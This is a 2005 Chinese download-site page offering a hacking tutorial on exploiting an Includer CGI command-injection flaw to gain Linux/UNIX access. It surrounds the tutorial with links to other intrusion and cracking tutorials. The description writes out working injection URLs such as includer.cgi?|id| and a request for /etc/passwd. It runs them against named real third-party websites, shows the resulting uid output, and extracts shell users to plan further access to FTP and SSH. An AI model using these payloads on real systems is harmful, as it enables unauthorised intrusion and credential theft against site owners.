利用Includer CGI漏洞获取LinuxUNIX系统权限免费 >> 软件信息

1	ms04011溢出动画教程 …
2	最新冲Q币又一新招 v1…
3	3389终端密码破解动画…
4	远程破解思科路由器密…
5	入侵BBSXP全攻略动画教…
6	给软件加壳脱壳躲避杀…
7	SQL注入华龙集团网站动…
8	SQL注入长城计算机官方…
9	QQ当木马 1.0
10	用IE直接控制肉鸡动画…

累计下载

1	情长黑客动画教程ISO光…
2	VMware workstation 4…
3	WebDavScan汉化版V1.0…
4	LC4 英文版
5	ms04011溢出动画教程 …
6	瑞星震荡波病毒专杀工…
7	天网防火墙2.5稳定破…
8	4899空口令探测器 Sca…
9	桂林老兵SQL注入工具 …
10	4899加神气儿入侵动画…

利用Includer CGI漏洞获取LinuxUNIX系统权限免费

文件大小：0 KB
软件等级：
授权方式：共享版
软件类别：国产软件
软件语言：简体中文
运行环境：Win9x/NT/2000/XP/
开发商：linyin E-mail
相关链接：开发商主页程序演示
更新时间：2005年05月20日 21时41分36秒
解压密码：无
下载等级：游客点数：0 点
下载次数：

□ 软件简介

利用Includer CGI漏洞获取Linux/UNIX系统权限

制作:linyin QQ:731582

漏洞描述:
Remote Command Execution on:
Example I.: www.host-vulnerable.com/includer.cgi?|id|
Example II.: www.host-vulnerable.com/includer.cgi?template=|id|

http://wowserbrowser.com/cgi-bin/include/includer.cgi?|id|
document.writeln('
Includer Error: The file 䞍靠烤堽兛靠緦 was not found.');
不是LINUX/UNIX系统,不是这种...接着来
http://www.stoweconstruction.com/gallery/includer.cgi?|id|
uid=555(stoweconstruction) gid=555(stoweconstruction) groups=555(stoweconstruction)<--就是他

http://www.stoweconstruction.com/gallery/includer.cgi?|uname%20-a|
我们加个-a参数就不能执行,没事,我们需要的是/etc/passwd文档
http://www.stoweconstruction.com/gallery/includer.cgi?/etc/passwd
看见没有,这样我们不就可以得到了/etc/passwd
但好像有点不咋好看,加工下.提取user表.
这样我们就提取了可以执行/bin/bash的shell的用户
这样我们可以得知对方起码开放了ftp和ssh服务. :) 很不错

□ 下载地址
如多个文件,请分别下载第一部分到第n部分,改名为part01,part02...partn,再解压.

下载地址1

下载地址2

□ 相关软件::

虚拟机的基本知识 1.0[352]

楚广明FreeBSD讲义动画(1-8) 1.0v[465]

手动编译并加载ntfs模块 v1.0[70]

Linux下Raid 5磁盘阵列演示动画 v1.0[344]

Windows与Linux双系统的安装免费[920]

::站内软件搜索::

□ 下载说明

* 如有解压密码且未明示，均为：www.fineacer.com
* 如果您发现该软件不能下载，请通知管理员，谢谢！
* 为了达到最快的下载速度，推荐使用网际快车下载本站软件。
* 未经本站明确许可，不得非法盗链及抄袭本站资源；如引用页面，请注明来自“情长在线”！

□ 网友评论：(只显示最新5条。评论内容只代表网友观点，与本站立场无关!)

【发表评论】

设为首页加入收藏关于本站免费服务广告服务归档中心站点地图版权申明联系站长友情链接